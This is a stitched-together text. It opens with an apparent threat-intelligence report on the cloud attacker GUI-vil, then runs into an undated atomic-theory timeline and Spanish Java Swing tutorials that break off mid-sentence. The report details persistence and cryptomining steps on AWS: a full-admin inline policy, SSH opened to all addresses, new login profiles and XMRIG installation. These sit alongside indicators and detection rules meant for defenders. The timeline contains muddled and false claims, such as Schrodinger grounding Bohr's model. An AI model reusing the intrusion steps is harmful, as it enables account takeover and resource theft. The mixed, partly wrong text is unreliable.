{ "eventVersion": "1.08", "userIdentity": { "type": "IAMUser", "principalId": "redacted", "arn": "arn:aws:iam::redacted:user/external_audit", "accountId": "redacted", "accessKeyId": "AKIA******", "userName": "external_audit" }, "eventTime": "2023-04-18T14:47:39.0000000Z", "eventSource": "s3.amazonaws.com", "eventName": "ListBuckets", "awsRegion": "us-east-1", "sourceIPAddress": "36.85.110.142", "userAgent": "[S3 Browser 9.5.5 https://s3browser.com]", "requestParameters": { "Host": "s3.us-east-1.amazonaws.com" }, "responseElements": null, "requestID": "T1ACJXN3EJQ4T58X", "eventID": "af6814ab-10e1-4c8a-88b6-384874592519", "readOnly": true, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "redacted", "eventCategory": "Management", "tlsDetails": { "tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "s3.us-east-1.amazonaws.com" }, "additionalEventData": { "SignatureVersion": "SigV4", "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 0, "AuthenticationMethod": "AuthHeader", "x-amz-id-2": "2ZRMAF9dvfjiLRZq1UoaE6tspOgoHk4X/Vtvjb8orWdQPGgJQiOuXhn13eOL3s4+BY/+Fuf7ZxE=", "bytesTransferredOut": 389 } } Escalate Privileges Given that cloud credentials are often grossly over-privileged, this threat actor does not often need to elevate their privileges. In one attack by GUI-vil though, the credentials the threat actor started with had read-only permissions across all services. The attacker used these credentials to review data in all available S3 buckets, and was able to find credentials with full administrator privileges in a Terraform tfstate file. Internal Recon GUI-vil has two (2) main methods of performing internal reconnaissance: • Review of accessible S3 buckets • Exploring what services are accessible and utilized by the victim organization via the AWS Management Console. Services we have observed them exploring (in order of descending prevalence) include: ec2.amazonaws.com health.amazonaws.com iam.amazonaws.com organizations.amazonaws.com elasticloadbalancing.amazonaws.com autoscaling.amazonaws.com monitoring.amazonaws.com cloudfront.amazonaws.com billingconsole.amazonaws.com s3.amazonaws.com compute-optimizer.amazonaws.com ce.amazonaws.com dynamodb.amazonaws.com config.amazonaws.com ram.amazonaws.com ssm.amazonaws.com kms.amazonaws.com securityhub.amazonaws.com servicecatalog-appregistry.amazonaws.com sts.amazonaws.com cloudtrail.amazonaws.com trustedadvisor.amazonaws.com logs.amazonaws.com dax.amazonaws.com sso.amazonaws.com support.amazonaws.com account.amazonaws.com elasticfilesystem.amazonaws.com resource-groups.amazonaws.com ds.amazonaws.com tagging.amazonaws.com cloudhsm.amazonaws.com access-analyzer.amazonaws.com resource-explorer-2.amazonaws.com Additionally, we observed GUI-vil monitoring CloudTrail logs for changes that the victims’ organizations were making when trying to evict GUI-vil from their environments. This allowed GUI-vil to adapt their persistence to bypass restrictions the victim organization was putting in place. 
{ "eventVersion": "1.08", "userIdentity": { "type": "IAMUser", "principalId": "redacted", "arn": "arn:aws:iam::redacted:user/andy", "accountId": "redacted", "accessKeyId": "ASIA****", "userName": "andy", "sessionContext": { "sessionIssuer": {}, "webIdFederationData": {}, "attributes": { "creationDate": "2023-04-19T01:16:27.0000000Z", "mfaAuthenticated": "false" } } }, "eventTime": "2023-04-19T01:21:14.0000000Z", "eventSource": "cloudtrail.amazonaws.com", "eventName": "LookupEvents", "awsRegion": "us-east-1", "sourceIPAddress": "36.85.110.142", "userAgent": "AWS Internal", "requestParameters": { "maxResults": 50, "lookupAttributes": [ { "attributeKey": "ReadOnly", "attributeValue": "false" } ] } Maintain Presence (IAM) In order to maintain a presence in the victim organization, GUI-vil has leveraged several different mechanisms. Based on observed activity, they exclusively utilize S3 Browser to make creations and modifications to the IAM service. • GUI-vil will often create new IAM users to maintain ensure they can persist in an environment in case their original compromised credentials are discovered. When creating IAM users GUI-vil will often attempt to conform to the naming standards of existing IAM users. For example, in one environment they created a user named sec_audit which they modelled off of other audit users in the organization. They do often move too fast for their own good, sometimes forgetting to take out the default name that S3 Browser supplies when creating a new user. Guivil 3browser Newuser { "eventVersion": "1.08", "userIdentity": { "type": "IAMUser", "principalId": "redacted", "arn": "arn:aws:iam::redacted:user/terraform", "accountId": "redacted", "userName": "terraform", "accessKeyId": "AKIA*****" }, "eventTime": "2023-04-18T15:05:27.0000000Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateUser", "awsRegion": "us-east-1", "sourceIPAddress": "36.85.110.142", "userAgent": "S3 Browser 9.5.5 <https://s3browser.com>", "requestParameters": { "userName": "sec_audit", "path": "/" }, "responseElements": { "user": { "arn": "arn:aws:iam::redacted:user/sec_audit", "userName": "sec_audit", "userId": "redacted", "createDate": "Apr 18, 2023 3:05:27 PM", "path": "/" } } • GUI-vil will also create access keys for the new identities they are creating so they can continue usage of S3 Browser with these new users. Guivil S3browser Createkey • GUI-vil will create login profiles, to enable access to AWS Management Console. We have observed GUI-vil apply this tactic to avoid the noise of creating a new user. They look for identities that do not have login profiles and, once found, create a login profile. This allows the attacker to inherit the permissions of that identity and stay under the radar of security teams that do not monitor new login profiles being created. 
Guivil S3browser Loginprofile { "eventVersion": "1.08", "userIdentity": { "type": "IAMUser", "principalId": "redacted", "arn": "arn:aws:iam::redacted:user/terraform", "accountId": "redacted", "accessKeyId": "AKIA****", "userName": "terraform" }, "eventTime": "2023-04-18T15:27:22.0000000Z", "eventSource": "iam.amazonaws.com", "eventName": "GetLoginProfile", "awsRegion": "us-east-1", "sourceIPAddress": "36.85.110.142", "userAgent": "S3 Browser 9.5.5 <https://s3browser.com>", "requestParameters": { "userName": "andy" }, "responseElements": null, "requestID": "33147b1e-f106-440e-b63a-f4fca8da0170", "eventID": "7d7ad4e4-3f50-42d1-af4f-6d7db737ecdb", "readOnly": true, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "redacted", "eventCategory": "Management", "tlsDetails": { "tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "iam.amazonaws.com" }, "errorCode": "NoSuchEntityException", "errorMessage": "Login Profile for User andy cannot be found." } { "eventVersion": "1.08", "userIdentity": { "type": "IAMUser", "principalId": "redacted", "arn": "arn:aws:iam::redacted:user/terraform", "accountId": "redacted", "accessKeyId": "AKIA****", "userName": "terraform" }, "eventTime": "2023-04-18T15:27:29.0000000Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateLoginProfile", "awsRegion": "us-east-1", "sourceIPAddress": "36.85.110.142", "userAgent": "S3 Browser 9.5.5 <https://s3browser.com>", "requestParameters": { "userName": "andy", "passwordResetRequired": false }, "responseElements": { "loginProfile": { "userName": "andy", "createDate": "Apr 18, 2023 3:27:29 PM", "passwordResetRequired": false } }, "requestID": "281e395e-3614-44f6-8531-5bcdca3a5507", "eventID": "4ced3dd4-1ab7-4e23-b659-7ca7d88c5d6e", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "redacted", "eventCategory": "Management", "tlsDetails": { "tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "iam.amazonaws.com" } iam:GetLoginProfile with error showing that a login profile does not currently exist { "eventVersion": "1.08", "userIdentity": { "type": "IAMUser", "principalId": "redacted", "arn": "arn:aws:iam::redacted:user/terraform", "accountId": "redacted", "accessKeyId": "AKIA****", "userName": "terraform" }, "eventTime": "2023-04-18T15:27:29.0000000Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateLoginProfile", "awsRegion": "us-east-1", "sourceIPAddress": "36.85.110.142", "userAgent": "S3 Browser 9.5.5 https://s3browser.com", "requestParameters": { "userName": "andy", "passwordResetRequired": false }, "responseElements": { "loginProfile": { "userName": "andy", "createDate": "Apr 18, 2023 3:27:29 PM", "passwordResetRequired": false } }, "requestID": "281e395e-3614-44f6-8531-5bcdca3a5507", "eventID": "4ced3dd4-1ab7-4e23-b659-7ca7d88c5d6e", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "redacted", "eventCategory": "Management", "tlsDetails": { "tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "iam.amazonaws.com" } } iam:CreateLoginProfile for the user that did not have a login profile already defined When GUI-vil creates IAM users, they also directly attach an inline policy via iam:PutUserPolicy to grant their user full privileges. 
{ "userName": "backup", "policyName": "backupuser", "policyDocument": "{\\r\\n \\"Statement\\": [\\r\\n {\\r\\n \\"Effect\\": \\"Allow\\",\\r\\n \\"Action\\": \\"*\\",\\r\\n \\"Resource\\": \\"*\\",\\r\\n \\"Condition\\": {}\\r\\n }\\r\\n ]\\r\\n}" } iam:PutUserPolicy to add inline policy granting full privileges to newly created user Maintain Presence (EC2) While they can maintain presence on the infrastructure level via the users and access keys they have created or taken over, the attacker can also maintain persistence to the environment via EC2. Simply by being able to connect to the EC2 instance they can assume the credentials of the EC2 instance. Often times the attacker will execute ec2:CreateKeyPair, enabling them to connect to the EC2 instance directly via SSH which they ensure is open to the internet on any EC2 instances they create. "data": { "eventVersion": "1.08", "userIdentity": { "type": "AssumedRole", "principalId": "AROA****:andy", "arn": "arn:aws:sts::redacted:assumed-role/AdminUser/andy", "accountId": "redacted", "accessKeyId": "ASIA*****", "sessionContext": { "sessionIssuer": { "type": "Role", "principalId": "AROA****", "arn": "arn:aws:iam::redacted:role/AdminUser", "accountId": "redacted", "userName": "AdminUser" }, "webIdFederationData": {}, "attributes": { "creationDate": "2023-04-18T15:30:24.0000000Z", "mfaAuthenticated": "false" } } }, "eventTime": "2023-04-18T15:33:12.0000000Z", "eventSource": "ec2.amazonaws.com", "eventName": "CreateKeyPair", "awsRegion": "us-east-1", "sourceIPAddress": "36.85.110.142", "userAgent": "AWS Internal", "requestParameters": { "keyName": "su32", "keyType": "rsa", "keyFormat": "ppk" }, "responseElements": { "requestId": "21e1134f-109e-4b4a-bea8-cc651b9e0db8", "keyName": "su32", "keyFingerprint": "e9:86:03:1e:81:4e:65:fb:78:41:f0:32:e0:29:ff:6e:9b:0e:fe:f0", "keyPairId": "key-0123456789abcdef0", "keyMaterial": "<sensitiveDataRemoved>" }, "requestID": "21e1134f-109e-4b4a-bea8-cc651b9e0db8", "eventID": "9338ea0b-b929-4a76-b024-2b3ea36cd484", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "redacted", "eventCategory": "Management", "sessionCredentialFromConsole": "true" } ec2:CreateKeyPair to create public and private key pair for remote access { "groupId": "sg-0123456789abcdef0", "ipPermissions": { "items": [ { "ipRanges": { "items": [ { "cidrIp": "0.0.0.0/0" } ] }, "prefixListIds": {}, "fromPort": 22, "toPort": 22, "groups": {}, "ipProtocol": "tcp", "ipv6Ranges": {} } ] } ec2:AuthorizeSecurityGroupIngress to add inbound (ingress) rule for port 22 to specified security group Complete Mission GUI-vil is financially motivated. They create EC2 instances in victim AWS organizations that they then use for crypto mining. Often times as they encounter resource limitations set by the victim organizations they will switch to other regions and attempt again. All EC2 instances they created have had these attributes: • Size xlarge and bigger (c4.4xlarge, p3.16xlarge, p3.2xlarge, p3.8xlarge) • TCP/22 open to 0.0.0.0 • IPv4 Enabled, IPv6 Disabled • Detailed CloudWatch monitoring disabled • Xen hypervisor Once an EC2 instance is created they connect to it via SSH, install required packages, then install and launch XMRIG: • apt-get update • apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev -y • /home/ubuntu/xmrig Indicators Atomic Indicators Indicator Type Notes 182.1.229.252 IPv4 PT. Telekomunikasi Selular 114.125.247.101 IPv4 PT. Telekomunikasi Selula 114.125.245.53 IPv4 PT. 
Telekomunikasi Selula 114.125.247.101 IPv4 PT. Telekomunikasi Selula 114.125.232.189 IPv4 PT. Telekomunikasi Selula 114.125.228.81 IPv4 PT. Telekomunikasi Selula 114.125.229.197 IPv4 PT. Telekomunikasi Selula 114.125.246.235 IPv4 PT. Telekomunikasi Selula 114.125.246.43 IPv4 PT. Telekomunikasi Selula 36.85.110.142 IPv4 PT Telekomunikasi Indonesia S3 Browser 9.5.5 https://s3browser.com/ UA   [S3 Browser 9.5.5 https://s3browser.com/ ] UA   su32 SSH Key Name   new-user-<8 alphanumeric characters> IAM User default naming standard for creating a user with S3 Browser sec_audit IAM User   sdgs IAM Policy   ter IAM Policy   backup IAM User   dq IAM Policy   Detections Permiso CDR Rules Permiso clients are protected from these attackers by the following detections: Permiso Detections P0_AWS_S3_BROWSER_USERAGENT_1 P0_MULTI_NEFARIOUS_USERAGENT_1 P0_AWS_SUSPICIOUS_ACCOUNT_NAME_CREATED_1 P0_GENERAL_SUSPICIOUS_ACCOUNT_NAME_CREATED_1 P0_COMMON_USER_ACTIVITY_NO_MFA_1 P0_AWS_IAM_INLINE_POLICY_ALLOW_ALL_1 P0_AWS_IAM_INLINE_POLICY_SHORT_NAME_1 P0_AWS_IAM_INLINE_POLICY_PASSROLE_1 P0_AWS_IAM_INLINE_POLICY_TEMPLATE_LANGUAGE_1 P0_AWS_EC2_MULTI_REGION_INSTANCE_CREATIONS_1 P0_AWS_HUMAN_CREATED_LARGE_EC2_1 P0_AWS_EC2_STARTED_CIDR_FULL_OPEN_PORT_22_1 For folks not on the Permiso platform, here are some basic sigma rules that can be used to identify GUI-vil: S3 Browser - IAM Policy w/Templated Language title: AWS IAM S3Browser Templated S3 Bucket Policy Creation id: db014773-7375-4f4e-b83b-133337c0ffee status: experimental description: Detects S3 Browser utility creating Inline IAM Policy containing default S3 bucket name placeholder value of <YOUR-BUCKET-NAME>. references: - <https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor> author: [email protected] (@danielhbohannon) date: 2023/05/17 modified: 2023/05/17 tags: - attack.execution - attack.t1059.009 - attack.persistence - attack.t1078.004 logsource: product: aws service: cloudtrail detection: selection_source: eventSource: iam.amazonaws.com eventName: PutUserPolicy filter_tooling: userAgent|contains: 'S3 Browser' filter_policy_resource: requestParameters|contains: '"arn:aws:s3:::<YOUR-BUCKET-NAME>/*"' filter_policy_action: requestParameters|contains: '"s3:GetObject"' filter_policy_effect: requestParameters|contains: '"Allow"' condition: selection_source and filter_tooling and filter_policy_resource and filter_policy_action and filter_policy_effect falsepositives: - Valid usage of S3 Browser with accidental creation of default Inline IAM Policy without changing default S3 bucket name placeholder value level: high S3 Browser - IAM LoginProfile title: AWS IAM S3Browser LoginProfile Creation id: db014773-b1d3-46bd-ba26-133337c0ffee status: experimental description: Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile. 
references: - <https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor> author: [email protected] (@danielhbohannon) date: 2023/05/17 modified: 2023/05/17 tags: - attack.execution - attack.t1059.009 - attack.persistence - attack.t1078.004 logsource: product: aws service: cloudtrail detection: selection_source: eventSource: iam.amazonaws.com eventName: - GetLoginProfile - CreateLoginProfile filter_tooling: userAgent|contains: 'S3 Browser' condition: selection_source and filter_tooling falsepositives: - Valid usage of S3 Browser for IAM LoginProfile listing and/or creation level: high S3 Browser - IAM User and AccessKey title: AWS IAM S3Browser User or AccessKey Creation id: db014773-d9d9-4792-91e5-133337c0ffee status: experimental description: Detects S3 Browser utility creating IAM User or AccessKey. references: - <https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor> author: [email protected] (@danielhbohannon) date: 2023/05/17 modified: 2023/05/17 tags: - attack.execution - attack.t1059.009 - attack.persistence - attack.t1078.004 logsource: product: aws service: cloudtrail detection: selection_source: eventSource: iam.amazonaws.com eventName: - CreateUser - CreateAccessKey filter_tooling: userAgent|contains: 'S3 Browser' condition: selection_source and filter_tooling falsepositives: - Valid usage of S3 Browser for IAM User and/or AccessKey creation level: high Observed Events (write level): ec2:AuthorizeSecurityGroupIngress ec2:CreateKeyPair ec2:CreateSecurityGroup ec2:CreateTags ec2:RunInstances ec2:TerminateInstances iam:CreateAccessKey iam:CreateLoginProfile iam:CreateUser iam:DeleteAccessKey iam:DeleteLoginProfile iam:DeleteUser iam:DeleteUserPolicy iam:PutUserPolicy signin:ExitRole signin:SwitchRole Illustration Cloud Related Articles Introducing Cloud Console Cartographer: An Open-Source Tool To Help Security Teams Easily Understand Log Events Generated by AWS Console Activity Introduction While most cloud CLI tools provide a one-to-one correlation between an API being invoked and a single corresponding API event being generated in cloud log telemetry, browser-based interactive console sessions differ profoundly across An Adversary Adventure with Cloud Administration Command Introduction As the cybersecurity landscape rapidly evolves, organizations are implementing multi-cloud solutions to advance their digital transformation initiatives. On the other hand, threat actors are unrelenting in developing sophisticated Introducing CloudGrappler: A Powerful Open-Source Threat Detection Tool for Cloud Environments IntroductionWith the increased activity of threat actor groups like LUCR-3 (Scattered Spider) over the last year, being able to detect the presence of these threat groups in cloud environments continues to present a significant challenge to most View more posts
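Beyond the managed detections and Sigma rules above, the S3 Browser indicator can also be hunted ad hoc against CloudTrail's LookupEvents API. The sketch below is an assumption-laden illustration using the AWS SDK for JavaScript v3 (@aws-sdk/client-cloudtrail); because LookupEvents cannot filter on user agent directly, it pulls recent IAM events and filters client-side, and the region, time window, and matched substring should be tuned to your environment.

import { CloudTrailClient, LookupEventsCommand } from "@aws-sdk/client-cloudtrail";

// Hunt recent IAM events whose user agent matches the S3 Browser tooling described above.
// Region, lookback window, and the matched substring are assumptions, not fixed values.
async function findS3BrowserIamEvents(): Promise<void> {
  const client = new CloudTrailClient({ region: "us-east-1" });
  const response = await client.send(
    new LookupEventsCommand({
      LookupAttributes: [{ AttributeKey: "EventSource", AttributeValue: "iam.amazonaws.com" }],
      StartTime: new Date(Date.now() - 24 * 60 * 60 * 1000), // last 24 hours
      MaxResults: 50,
    })
  );
  for (const event of response.Events ?? []) {
    // Each lookup result carries the raw CloudTrail record as a JSON string.
    const raw = JSON.parse(event.CloudTrailEvent ?? "{}");
    if (typeof raw.userAgent === "string" && raw.userAgent.includes("S3 Browser")) {
      console.log(event.EventName, raw.userAgent, raw.sourceIPAddress);
    }
  }
}

findS3BrowserIamEvents().catch(console.error);

Note that LookupEvents only covers management events in the queried region for the last 90 days, so this is a quick triage aid rather than a substitute for centralized CloudTrail log analysis.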
History of the Atom Project (wesley bradley)

• 492 BCE (approx.): Democritus formulates his atomic theory, the first of its kind, which says that all things are made up of indivisible, invisible, always moving, and unique particles.
• Period: 460 BCE to 370 BCE: Democritus' lifetime.
• Lavoisier is born: Antoine Lavoisier is born in Paris, France.
• Period: Antoine Lavoisier's lifetime.
• Lavoisier attends the College of Four Nations.
• John Dalton born: John Dalton is born to a Quaker family in Cumberland, England.
• Period: John Dalton's lifetime. Dalton built upon Democritus' atomic theory, which had gone largely unchanged and unchallenged for two millennia.
• Lavoisier discovers that the mass of an object stays the same after it undergoes a chemical change.
• The elements oxygen and hydrogen are officially named by Antoine Lavoisier.
• Antoine Lavoisier writes his first chemistry book.
• Lavoisier dies: Antoine Lavoisier dies at the age of 50 in Paris, France; his spouse dies the same year.
• Dalton orally presents some of his scientific papers on the subjects of vapor, steam, pressure, etc.
• Atomic theory published: John Dalton announces his famous atomic theory, built upon Democritus' theory, to the scientific community.
• John Dalton dies in Manchester; 40,000 people attend his funeral.
• JJ Thomson born: JJ Thomson is born in Cheetham Hill, England.
• Period: JJ Thomson's lifetime. Thomson determined that matter was made up of minuscule particles smaller than atoms, which he called "corpuscles," although the name never stuck. They are what we now know as electrons, and his discovery upended the then-current theory that the atom was the smallest unit in existence. He also determined that electrons were negatively charged, but recognized that because matter is neutrally charged, there must be a positive charge within each atom to offset the electrons.
• Max Planck born: Max Planck is born in Kiel, Holstein, Germany.
• Period: Max Planck's lifetime. He is considered by the scientific community to be the founder of quantum theory. He presented a theoretical explanation of the spectrum of radiation emitted by a glowing object, proposing that the walls of an object contain resonators that oscillate at different frequencies; this led him to conclude that energy does not flow in a steady continuum.
• Marie Curie born: Marie Curie is born in Warsaw, Poland; at the time it was part of the Russian Empire.
• Period: Marie Curie's lifetime. She discovered the elements radium and polonium and was influential in medicine for her experiments relating to radiation. She predicted that atoms store immense energy, that radioactive energy comes from within atoms, and that the Earth was already covered in it. She invented the word "radioactivity" for her findings.
• Robert Millikan born: Robert Millikan is born in Morrison, Illinois.
• Period: Robert Millikan's lifetime. He determined the exact charge of an electron in 1909 and created a way of calculating the mass of the electrons and the positively charged portions of the atom. He found that the mass of an electron, which is always the same, is about 1,000 times smaller than that of the smallest atom known at the time.
• Ernest Rutherford born: Ernest Rutherford is born on a farm in a New Zealand village, the fourth of twelve children.
• Period: Ernest Rutherford's lifetime. He was responsible for a series of outstanding discoveries in radioactivity and nuclear physics. Specifically, he discovered the existence of alpha and beta rays, produced the laws of radioactive decay, and hypothesized the nuclear structure of the atom. His model of the atom, with protons in the nucleus and electrons orbiting it, is the most accurate in this timeline.
• Albert Einstein is born in Ulm, Germany.
• Period: Albert Einstein's lifetime. Einstein devised a way of predicting the sizes of atoms and molecules. Along with many other scientific contributions, he developed the quantum theory of heat and the theory of relativity.
• JJ Thomson is appointed professor of physics at the Cavendish Laboratory, Cambridge.
• Planck is appointed professor extraordinarius at the University of Kiel.
• Niels Bohr born in Copenhagen, Denmark.
• Period: Niels Bohr's lifetime. He made remarkable contributions to quantum theory and devised the Bohr model, which helped portray atomic structure and is still in use today. He also proposed the liquid-drop model of the nucleus.
• Erwin Schrodinger born in Erdberg, Vienna, Austria.
• Period: Erwin Schrodinger's lifetime. He provided the basis for Bohr's famous atomic model by devising a way to find where an electron of an atom would be at any given time.
• James Chadwick born: James Chadwick is born in Bollington, England.
• Period: James Chadwick's lifetime. In 1932 his research led him to discover that the nucleus of an atom contains neutrons, which carry a neutral charge, unlike protons or electrons. This discovery was pivotal to the later discovery of nuclear fission, which would later assist in the building of atomic bombs.
• Louis de Broglie born in Dieppe, France.
• Period: Louis de Broglie's lifetime. His ideas assisted in the development of wave mechanics, the theory that electrons can act like both particles and waves: waves produced by electrons constrained to orbit the nucleus of an atom set up a standing wave of definite energy, frequency, and wavelength.
• Rutherford wins a scholarship to Cambridge University.
• Thomson begins his investigations.
• Marie marries Pierre Curie.
• Thomson finds that cathode rays can be deflected in an electric field.
• Rutherford discovers radon gas.
• Planck announces his findings to the German physics society.
• Werner Heisenberg is born.
• Period: Werner Heisenberg's lifetime. His signature contribution to physics was the uncertainty principle, which states that the determination of the position and momentum of a moving particle necessarily contains errors that cannot be smaller than the quantum constant; although the errors are negligible on a human scale, they cannot be ignored on an atomic scale.
• Marie Curie discovers pure radium.
• Marie and Pierre Curie share a Nobel Prize.
• Albert Einstein publishes his first paper on thermodynamics.
• JJ Thomson awarded a Nobel Prize.
• Marie Curie widowed; Pierre Curie dies.
• JJ Thomson given the Order of Merit and knighted.
• Rutherford awarded the Nobel Prize in chemistry.
• Millikan begins his experiments; he determined the exact charge of an electron and created a way of formulating the mass of the electrons and positively charged protons in an atom.
• Einstein becomes professor extraordinarius at Zurich University.
• Rutherford discovers the nucleus via the gold foil experiment.
• Marie Curie wins a Nobel Prize.
• Bohr begins to work in Rutherford's laboratories.
• Niels Bohr publishes his findings on atomic structure.
• Ernest Rutherford is knighted.
• Broglie joins the French army as an engineer.
• Bohr becomes a professor at Copenhagen University.
• Max Planck awarded a Nobel Prize.
• Schrodinger is drafted into the army as an artillery corpsman.
• James Chadwick studies under the guidance of Rutherford.
• Millikan becomes the director of Caltech.
• Einstein wins a Nobel Prize.
• Bohr wins a Nobel Prize.
• Robert Millikan awarded a Nobel Prize.
• James Chadwick ends his studies on radioactivity.
• Louis de Broglie publishes research papers on electrons and quantum structures.
• Heisenberg publishes his quantum theories.
• Erwin Schrodinger publishes his famous wave equation.
• Broglie awarded a Nobel Prize.
• Chadwick finds definite proof that neutrons exist within the nucleus.
• Werner Heisenberg given a Nobel Prize.
• Albert Einstein emigrates from Germany.
• Schrodinger awarded a Nobel Prize.
• Marie Curie dies in Sallanches, France.
• James Chadwick awarded a Nobel Prize.
• Ernest Rutherford dies.
• JJ Thomson dies.
• Max Planck dies.
• Albert Einstein dies of heart failure.
• Robert Millikan dies.
• Erwin Schrodinger dies in Vienna, Austria.
• Niels Bohr dies.
• James Chadwick dies.
• Heisenberg dies.
• Louis de Broglie dies at Louveciennes, France.
Código Java – Cambiar la Apariencia de la Interfaz Gráfica con LookAndFeel Este es el Ejemplo #18 del Topic: Programación Gráfica en Java. En este post vamos a jugar un poco porque aprenderemos a cambiar la apariencia de todos los componentes y contenedores de Java haciendo uso de las librerías del tipo LookAndFeel, todo esto con tan solo unas cuantas lineas de código que servirá para todo el proyecto sin importar de cuantos formularios o frames esté compuesto. El Framework de java trae ya incluido algunos diseños que podemos usar directamente, esto no quiere decir que sean los únicos, los LookAndFeel podemos crearlo nosotros, personalizarlo o conseguirlo por medio de terceros. En este ejemplo muestro los que trae por defecto y agrego uno más a las librerías del proyecto, que lo encontré en los repositorios de Google Code y me por cierto se ve muy bien; es el seaglasslookandfeel. Descargar: SeaGlassLookAndFeel El código mostrará un frame con algunos componentes típicos añadidos, y en un ComboBox, los estilos que tomarán inmediatamente al seleccionarlo. Para empezar, muestro la función que creo es la esencia, el cual recibirá como parámetro el estilo que se dará a la GUI: ... private void setLookAndFeel(String laf) { if (laf==null) { laf=UIManager.getSystemLookAndFeelClassName(); } else { try { UIManager.setLookAndFeel(laf); } catch (InstantiationException ex) { } catch (ClassNotFoundException ex) { } catch (UnsupportedLookAndFeelException ex) { } catch (IllegalAccessException ex) { } } SwingUtilities.updateComponentTreeUI(this); } ... Código de Ejemplo: /** * seaglasslookandfeel-0.1.5.jar */ package beastieux.gui; import java.awt.GridLayout; import javax.swing.DefaultComboBoxModel; import javax.swing.JButton; import javax.swing.JCheckBox; import javax.swing.JComboBox; import javax.swing.JFrame; import javax.swing.JPanel; import javax.swing.JTextField; import javax.swing.SwingUtilities; import javax.swing.UIManager; import javax.swing.UnsupportedLookAndFeelException; /** * * @author beastieux */ public class Ejm18_LookAndFeel extends JFrame { JComboBox cmb1=new JComboBox(); public Ejm18_LookAndFeel() { JPanel pnlEjemplo=new JPanel(); JTextField txt1=new JTextField(); JCheckBox chk1=new JCheckBox("Opcion 1"); cmb1.setModel(new DefaultComboBoxModel (new String[] { "Estilo MetalLookAndFeel", "Estilo MotifLookAndFeel", "Estilo GTKLookAndFeel", "Estilo NimbusLookAndFeel", "Estilo WindowsLookAndFeel", "Estilo SeaGlassLookAndFeel" })); cmb1.addItemListener(new java.awt.event.ItemListener() { public void itemStateChanged(java.awt.event.ItemEvent evt) { cmb1ItemStateChanged(evt); } }); JButton btn1=new JButton("Button 1"); pnlEjemplo.add(txt1); pnlEjemplo.add(cmb1); pnlEjemplo.add(chk1); pnlEjemplo.add(btn1); pnlEjemplo.setLayout(new GridLayout(5,1)); this.add(pnlEjemplo); this.setSize(500, 150); setDefaultCloseOperation(javax.swing.WindowConstants.DISPOSE_ON_CLOSE); } private void cmb1ItemStateChanged(java.awt.event.ItemEvent evt) { switch(cmb1.getSelectedIndex()) { case 0: setLookAndFeel("javax.swing.plaf.metal.MetalLookAndFeel"); break; case 1: setLookAndFeel("com.sun.java.swing.plaf.motif.MotifLookAndFeel"); break; case 2: setLookAndFeel("com.sun.java.swing.plaf.gtk.GTKLookAndFeel"); break; case 3: setLookAndFeel("com.sun.java.swing.plaf.nimbus.NimbusLookAndFeel"); break; case 4: setLookAndFeel("com.sun.java.swing.plaf.windows.WindowsLookAndFeel"); break; case 5: setLookAndFeel("com.seaglasslookandfeel.SeaGlassLookAndFeel"); break; default: setLookAndFeel(null); } } private void 
setLookAndFeel(String laf) { if (laf==null) { laf=UIManager.getSystemLookAndFeelClassName(); } else { try { UIManager.setLookAndFeel(laf); } catch (InstantiationException ex) { } catch (ClassNotFoundException ex) { } catch (UnsupportedLookAndFeelException ex) { } catch (IllegalAccessException ex) { } } SwingUtilities.updateComponentTreeUI(this); } public static void main(String args[]) { Ejm18_LookAndFeel obj = new Ejm18_LookAndFeel(); obj.setVisible(true); } } Anuncios Código Java – Agregar un Componente JCalendar al Proyecto Este es el Ejemplo #17 del Topic: Programación Gráfica en Java. En el post anterior hablamos sobre los CheckBoxList, ahora tocaremos otro componente también importante y muy usado que es el Calendar. He encontrado muchos componentes de este tipo pero la mayoría de ellos de pago y otros gratuitos pero sin buen diseño. Al final pude encontrar algo en SourceForge y seguramente podría servirnos mucho; es un JCalendar en dos presentaciones, un frame del calendar como tal y la otra modalidad incrustada en un combo. Descargar: JCalendar.jar Luego de descargar el JCalendar.jar vamos a importarlo al proyecto. Para que sea más accesible en el futuro podemos agregar el componente al panel de Beans de la IDE en el cual estamos trabajando y de esa manera solo tendremos que arrastrarlo al contenedor cada vez que tengamos que usarlo. En el siguiente ejemplo agrego ambas presentaciones del JCalendar a JFrame: /** * jcalendar.jar */ package beastieux.gui; import java.awt.FlowLayout; import javax.swing.JFrame; import org.freixas.jcalendar.JCalendar; import org.freixas.jcalendar.JCalendarCombo; /** * * @author beastieux */ public class Ejm17_JCalendar extends JFrame { public Ejm17_JCalendar() { JCalendar calEjemplo1=new JCalendar(); JCalendarCombo calEjemplo2=new JCalendarCombo(); this.add(calEjemplo1); this.add(calEjemplo2); this.setLayout(new FlowLayout()); this.setSize(400, 300); setDefaultCloseOperation(javax.swing.WindowConstants.DISPOSE_ON_CLOSE); } public static void main(String args[]) { Ejm17_JCalendar obj = new Ejm17_JCalendar(); obj.setVisible(true); } } Código Java – Agregar un Componente CheckBoxList al Proyecto Este es el Ejemplo #16 del Topic: Programación Gráfica en Java. A menudo necesitamos hacer uso de algunos componentes especiales pero no contamos con ellos, a veces lo que nos ofrece la plataforma de desarrollo no nos es suficiente y la opción está en crear nuestros propios componentes. Pero sin embargo existe otra posibilidad como comprar componentes de terceros o conseguirlo de manera gratuita, apuesto a que la mayoría lo prefiere de la última forma. Recuerdo que hace tiempo hice un 